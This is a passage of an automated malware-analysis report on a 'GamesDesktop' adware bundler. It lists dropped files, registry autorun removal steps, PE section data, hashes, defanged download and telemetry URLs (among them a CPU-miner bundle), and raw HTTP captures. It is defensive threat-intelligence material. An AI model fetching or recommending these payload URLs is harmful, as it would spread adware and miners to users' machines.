%Documents and Settings%\%current user%\Local Settings\Temp\nsc1C.tmp\registry.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc1C.tmp\checks.txt (544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm1B.tmp (8776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc1C.tmp\amisid.exe (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\post_reply.htm (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\registry.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\checks.txt (544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\thankyou[1].php (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss1E.tmp (8776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\amisid.exe (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-6JM0V.tmp\nsx27.tmp (3781 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\GAMESDESKTOP\GamesDesktop.lnk (812 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\upgmsd_re_005010096.7z (7433 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\encrypt.exe (4185 bytes)
%Program Files%\gmsd_re_005010096\predm.exe (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\is-42CRH.tmp (7433 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\is-QF5NP.tmp (15278 bytes)
%Program Files%\gmsd_re_005010096\gmsd_re_005010096.exe (29430 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\_isetup\_shfoldr.dll (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\gamesdesktop_widget.7z (15278 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\is-UJDHN.tmp (4185 bytes)
%Program Files%\gmsd_re_005010096\unins000.msg (375 bytes)
%Program Files%\gmsd_re_005010096\gamesdesktop_widget.exe (77005 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\gmsd_re_005010096.7z (8657 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\itdownload.dll (1281 bytes)
%Program Files%\gmsd_re_005010096\is-QNSOT.tmp (22284 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\predm.7z (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\ex.bat (1564 bytes)
%Program Files%\gmsd_re_005010096\unins000.dat (29605 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010096\upgmsd_re_005010096.exe (23062 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\is-TA4AV.tmp (8657 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\CheckProc.cmd (288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\is-KNG9H.tmp (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\upgmsd_re_005010096.exe (24230 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\predm.exe (1447 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\gmsd_re_005010096.exe (31996 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\gamesdesktop_widget.exe (92311 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr20.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nssE.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst4.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh11.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso13.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf7.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\7121923af824073a25b2b7e6ba0a6e0e[1].exe (6984 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd41.tmp (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa28.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf46.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss26.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy34.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp45.tmp (38832 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LLHPASG1\CESwN2Es[1].exe (11704 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg10.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M5WEVZKN\setup[1].exe (128293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M5WEVZKN\VuuPC_VO2_8907[1].exe (14960 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm22.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu3B.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss40.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp5.tmp (869 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LLHPASG1\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb2D.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\Bundle_CPUminer[1].exe (7288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu14.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr21.tmp (7288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\setup_gmsd_re[1].exe (365499 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M5WEVZKN\Validate[1].exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy42.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsqA.tmp (11704 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq9.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg4B.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M5WEVZKN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LLHPASG1\AnyProtectSetup[1].exe (38832 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb2E.tmp (13784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nssF.tmp (128293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3D.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz36.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3C.tmp (14960 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk6.tmp (3656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (90 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj35.tmp (5952 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M5WEVZKN\vos[1].htm (869 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M5WEVZKN\smt[1].exe (13784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2F.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\cmmdWriter[1].exe (3656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmB.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk15.tmp (6984 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LLHPASG1\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg16.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk44.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\policyname[1].exe (5952 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx27.tmp (365499 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrD.tmp (7695 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"upgmsd_re_005010096.exe" = "%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010096\upgmsd_re_005010096.exe -runhelper"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"gmsd_re_005010096" = "%Program Files%\gmsd_re_005010096\gmsd_re_005010096.exe" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name:
Product Name:
Product Version: 1.0.0.1
Legal Copyright: Copyright 2013
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.1
File Description:
Comments:
Language: English (United States)
Company Name: Product Name: Product Version: 1.0.0.1Legal Copyright: Copyright 2013Legal Trademarks: Original Filename: Internal Name: File Version: 1.0.0.1File Description: Comments: Language: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 23628 | 24064 | 4.46394 | 856b32eb77dfd6fb67f21d6543272da5 |
.rdata | 28672 | 4764 | 5120 | 3.4982 | dc77f8a1e6985a4361c55642680ddb4f |
.data | 36864 | 154712 | 1024 | 3.3278 | 7922d4ce117d7d5b3ac2cffe4b0b5e4f |
.ndata | 192512 | 11665408 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 11857920 | 17152 | 17408 | 4.10655 | a504ed888327f013e9b6042c9ab3920f |
Dropped from:
b94011d26f9ca72020b33e8540b8d716
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 12
cd94fdb6cad0a1bdfdd660de105c7c7e
9ffcde27b445393ee950de1371e7c43b
7975cef8969d02a0cabd784a3c74c8cb
6014e42e22c25611cc80146e840cbe2b
97e4952df76a56d68e69044e1a43d39f
9afaab770c0e2b9d5905c10288742f99
e9c53b8632b68f0292577f666a972eb4
6f4730a0be5e8067038de9457fdac074
e85909bb2d7c5931b7f2139fefceab0e
6cd2ca94541223158754aefc3f898dd4
8537c506876458e69f1ae9ab7fe92f6c
df84eb115ec1c2bc974734c43acd2d72
Network Activity
URLs
URL | IP |
---|---|
hxxp://ibf-cmi-1938953175.us-east-1.elb.amazonaws.com/ | 54.243.67.55 |
hxxp://livestatscounter.com/Generic/vos.php?ch=NOCHPC&rdsn=0&idn=0&sid=&isnw=7&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= | 50.7.86.58 |
hxxp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe | 54.239.168.49 |
hxxp://livestatscounter.com/SysInfo/validator/timer.php | 50.7.86.58 |
hxxp://cds.c5z6s5a3.hwcdn.net/69/all/cp/row/setup.exe | |
hxxp://ipgeoapi.com/ | 184.73.240.107 |
hxxp://cds.c5z6s5a3.hwcdn.net/data.gif?app=12345&ibic=951432958192de010e9b45488dbf5014&verifier=7322dfe1785c6f32282020c020be2048&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=3&rnd=8819 | |
hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=started&ibic=951432958192de010e9b45488dbf5014&verifier=7322dfe1785c6f32282020c020be2048&os=XP32&chver=X&ffver=X&iever=6&app=12345&srcid=003266&default=ie&ver=107&crtnm=OralTeams&rnd=2919 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=100&n=install_browser_start_async&ibic=951432958192de010e9b45488dbf5014&rnd=1121 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=250&n=install_browser_downloading&ibic=951432958192de010e9b45488dbf5014&rnd=7294 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=270&n=install_browser_all_thread_created_success&ibic=951432958192de010e9b45488dbf5014&rnd=2572 | |
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/107/ie.zip.004 | |
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/107/ie.zip.001 | |
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/107/ie.zip.002 | |
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/107/ie.zip.003 | |
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/107/ie.zip.005 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=310&n=install_browser_all_thread_ended_success&ibic=951432958192de010e9b45488dbf5014&rnd=6565 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=360&n=install_browser_all_files_in_place&ibic=951432958192de010e9b45488dbf5014&rnd=1178 | |
hxxp://d1mdi78qyff344.cloudfront.net/7121923af824073a25b2b7e6ba0a6e0e.exe | 54.239.168.174 |
hxxp://cds.r5q6q4j7.hwcdn.net/OperaRUnew/Bundle_OperaRUnew.exe | |
hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/thankyou.php | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=410&n=install_browser_install_ch_success&ibic=951432958192de010e9b45488dbf5014&rnd=657 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=480&n=install_browser_end_success&ibic=951432958192de010e9b45488dbf5014&rnd=3332 | |
hxxp://cds.c5z6s5a3.hwcdn.net/data.gif?app=12345&ibic=951432958192de010e9b45488dbf5014&verifier=7322dfe1785c6f32282020c020be2048&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=4&rnd=8567 | |
hxxp://cds.r5q6q4j7.hwcdn.net/CPUminer/v6/Bundle_CPUminer.exe | |
hxxp://dl.tuto4pc.com/download/dwn/prq4633/este/re/setup_gmsd_re.exe | |
hxxp://prof.eorezo.com/cgi-bin/get_protect.cgi?checking=true&version=gmsd_us_233&forceGEO=US | 37.187.137.144 |
hxxp://ads.regiedepub.com/cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=142493&tag=RE_CLICKMEIN_INSTALL_INI | 37.187.148.215 |
hxxp://prof.eorezo.com/cgi-bin/get_protect.cgi | 37.187.137.144 |
hxxp://ads.under-myscreen.be/cgi-bin/advert/getkws.cgi?did=90068&version=0&key=azJJ.s8MVPsHc | 188.165.236.39 |
hxxp://ads.regiedepub.com/cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=142493&tag=RE_CLICKMEIN_INSTALL_F11 | 37.187.148.215 |
hxxp://ads.regiedepub.com/cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=142493&tag=RE_CLICKMEIN_INSTALL_FIN | 37.187.148.215 |
hxxp://ads.regiedepub.com/cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=142493&tag=RE_CLICKMEIN_COUNT1 | 37.187.148.215 |
hxxp://ads.regiedepub.com/cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=142493&tag=RE_CLICKMEIN_DCOUNT1 | 37.187.148.215 |
hxxp://d10huri5h4o4a3.cloudfront.net/smt.exe | 54.239.168.217 |
hxxp://d2fpsq9kg43yka.cloudfront.net/sdk/binsis/2.2/BiTool.dll | 54.239.168.49 |
hxxp://d3oxtn1x3b8d7i.cloudfront.net/binsis/get_pre_offering_checks?uid=8A52D41A77F94021AA693531F4B425AD&v=2.2.2&v1=U2VyaWFsTnVtYmVyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWZXJzaW9uICAgICAgICAgICANDQpWTXdhcmUtNTYgNGQgOTEgYTcgMjYgNjcgYjIgYWQtNWMgMDIgMzcgNDIgZmEgOGEgOGIgMzcgIElOVEVMICAtIDYwNDAwMDA&affid=vuupcntmb&sid=vuupculwo&s=0 | 54.192.202.33 |
hxxp://d3oxtn1x3b8d7i.cloudfront.net/binsis/xml?uid=8A52D41A77F94021AA693531F4B425AD&v=2.2.2&v1=U2VyaWFsTnVtYmVyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWZXJzaW9uICAgICAgICAgICANDQpWTXdhcmUtNTYgNGQgOTEgYTcgMjYgNjcgYjIgYWQtNWMgMDIgMzcgNDIgZmEgOGEgOGIgMzcgIElOVEVMICAtIDYwNDAwMDA&affid=vuupcntmb&sid=vuupculwo&s=0 | 54.192.202.33 |
hxxp://d3oxtn1x3b8d7i.cloudfront.net/installers/bi_downloader/1443211351854/setup.exe | 54.192.202.33 |
hxxp://d10huri5h4o4a3.cloudfront.net/policyname.exe | 54.239.168.217 |
hxxp://sstatic1.histats.com/0.gif?2948573&101&101 | 208.43.241.179 |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=480&n=install_browser_end_success&ibic=951432958192de010e9b45488dbf5014&rnd=3332 | 54.231.1.180 |
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/107/ie.zip.001 | 69.16.175.10 |
hxxp://mystats.rgbdomsrv.com/installer.gif?action=started&ibic=951432958192de010e9b45488dbf5014&verifier=7322dfe1785c6f32282020c020be2048&os=XP32&chver=X&ffver=X&iever=6&app=12345&srcid=003266&default=ie&ver=107&crtnm=OralTeams&rnd=2919 | 54.231.9.44 |
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/107/ie.zip.003 | 69.16.175.10 |
hxxp://dl.staticclientstorage.com/69/all/cp/row/setup.exe | 69.16.175.10 |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=360&n=install_browser_all_files_in_place&ibic=951432958192de010e9b45488dbf5014&rnd=1178 | 54.231.1.180 |
hxxp://www.software-forus.com/CPUminer/v6/Bundle_CPUminer.exe | 205.185.216.42 |
hxxp://logs.rgbdomsrv.com/data.gif?app=12345&ibic=951432958192de010e9b45488dbf5014&verifier=7322dfe1785c6f32282020c020be2048&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=3&rnd=8819 | 69.16.175.10 |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=310&n=install_browser_all_thread_ended_success&ibic=951432958192de010e9b45488dbf5014&rnd=6565 | 54.231.1.180 |
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/107/ie.zip.005 | 69.16.175.10 |
hxxp://logs.rgbdomsrv.com/data.gif?app=12345&ibic=951432958192de010e9b45488dbf5014&verifier=7322dfe1785c6f32282020c020be2048&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=4&rnd=8567 | 69.16.175.10 |
hxxp://sub.spirlymo.com/installers/bi_downloader/1443211351854/setup.exe | 54.239.168.25 |
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/107/ie.zip.002 | 69.16.175.10 |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=100&n=install_browser_start_async&ibic=951432958192de010e9b45488dbf5014&rnd=1121 | 54.231.1.180 |
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/107/ie.zip.004 | 69.16.175.10 |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=270&n=install_browser_all_thread_created_success&ibic=951432958192de010e9b45488dbf5014&rnd=2572 | 54.231.1.180 |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=250&n=install_browser_downloading&ibic=951432958192de010e9b45488dbf5014&rnd=7294 | 54.231.1.180 |
hxxp://www.software-forus.com/OperaRUnew/Bundle_OperaRUnew.exe | 205.185.216.42 |
hxxp://www.downloadsoup.com/thankyou.php | 54.243.139.119 |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=410&n=install_browser_install_ch_success&ibic=951432958192de010e9b45488dbf5014&rnd=657 | 54.231.1.180 |
hxxp://prof.youandmeandmeandyouhihi.com/cgi-bin/get_protect.cgi | 37.187.146.34 |
hxxp://dl.taxideataxus.com/download/dwn/prq4633/este/re/setup_gmsd_re.exe | 188.165.230.78 |
hxxp://d27foqb3kkzkt9.cloudfront.net/sdk/binsis/2.2/BiTool.dll | 54.239.168.66 |
s3.amazonaws.com | 54.231.2.168 |
upd.adskyforever.com | 37.187.147.141 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /crossbrowse/ie/107/ie.zip.004 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: zip.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 20:58:13 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1441008913"
Last-Modified: Mon, 31 Aug 2015 08:15:13 GMT
Cache-Control: max-age=47110
Content-Length: 8244985
Content-Type: text/plain; charset=UTF-8
X-HW: 1443214693.dop008.fr7.t,1443214693.cds005.fr7.c
......."`...P.PB.............z.....R^z......cxT...x... ;K.....8..9i....|9..7...D..p[.2..!!.S.._.^..Z..W..8.@.'..\&!.!k...~..4.......f.V.u...0...^......,T;.....%......ch...F..c.........G.2../l.wr 1.&.?!..r.k.U....}%....w....}.2...}......oD.KX.G....p...s...$.W...c.Q.*<.4...Lz...@r.g;....~..w#..........`..@..m...){..$.......=z...J23..Bp....~.2.j.......pJ..X..C... .U.O5..h............._W...)#....:_lk.b.Z'..]..s0...6Y%..W........<...cP\Y..G.u.,U..B.og...8.C.~.8~..tj...t ....TT.-UQ....M.....1N-.x....P.p.#...wI..W...G.[.jO..Q.2.V1=..,/.......~..........."..Hma..se...^?.k....=...5...p.....I..G.hm. .vD....._...[.l...,.......s....O.....WU.v-:'.j..%...|....7.g...'..o1..._m.,.!.n.V.........Y5...}s<t..G.R3;R;8.....yP=.-.N...l{..r9..4.n&...U4..n..p.W....{d/l......*....!O*.j.}...%Q.....k.j..1=^.@G....!jI..5.....^7.O. ...DwR.....J/.@..4d."... ..$...#..........Xc.R>Vv.......;.d..C..W....'.....8 .*4Xw.drM.^...UE.C...]>.....ycA.... ....l..:..z..y....=I......9.........z.y......uX.... .T..........d-dj.7.d.!Q.qCqj.4.S{.&.".......s;..P.\.l..7...-OP....I...._\.YX2.6.Mb..._...5O.4....e..tyo...z.z.2.8..5........W..7......|.$............^..]..x...|...S...$....F.|_.SS......=...'...`rX....y...e.O..b...............U9hPfr..5KJ6;&.....d.d.......... .j....Wu.:...hk...a..s...]......?..T.]..8.cRN...........6..C=[.k....`......s]$.B, ....7;A......... ^.h~{..\:ybG.$..f.Q..l........#..FB.. ..........;.,RS.4].B-...N.EyNE...q.P_..g..}AY~_gz......42...%......Nx..D.D.!.]...[..o.1..&....."W.........nKK..).....<.x.@............?.m......c
<<< skipped >>>
GET /utility.gif?report=fdata&f=4&c=003266&i=100&n=install_browser_start_async&ibic=951432958192de010e9b45488dbf5014&rnd=1121 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: YLopITNBcjpN6ZNi8bUL6iTNRHGJ4dIu o9d5cWkUkgX4APfSBwwAM3iZbDUF2fy
x-amz-request-id: BAEF3C8F442293E7
Date: Fri, 25 Sep 2015 20:58:14 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=4&c=003266&i=250&n=install_browser_downloading&ibic=951432958192de010e9b45488dbf5014&rnd=7294 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: ET3xUecvZStOBGT3yC0wimpaKYLCNwjfv5qE4TLp96oWD/bz8SQ5jHt9DcKq8K1I
x-amz-request-id: 58036336FBC82E2B
Date: Fri, 25 Sep 2015 20:58:14 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=4&c=003266&i=270&n=install_browser_all_thread_created_success&ibic=951432958192de010e9b45488dbf5014&rnd=2572 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: zweZsynuCa4vHJ5gXggxq4M211jIyHQDTMCfxHSA5o9vGoU30SN YdFasTdILWLX
x-amz-request-id: C9044ADDEA476483
Date: Fri, 25 Sep 2015 20:58:14 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: zweZsynuCa4vHJ5gXggxq4M211jIyHQDTMCfxHSA5o9vGoU30SN YdFasTdILWLX..x-amz-request-id: C9044ADDEA476483..Date: Fri, 25 Sep 2015 20:58:14 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=4&c=003266&i=310&n=install_browser_all_thread_ended_success&ibic=951432958192de010e9b45488dbf5014&rnd=6565 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: 7cg95osLL5z4DfX2gGVw4E9A19i6of3RrseV4p1UfGOZPhyxLZIMoI7hetPOskIW
x-amz-request-id: ABBF092CEF73FE0F
Date: Fri, 25 Sep 2015 20:58:24 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
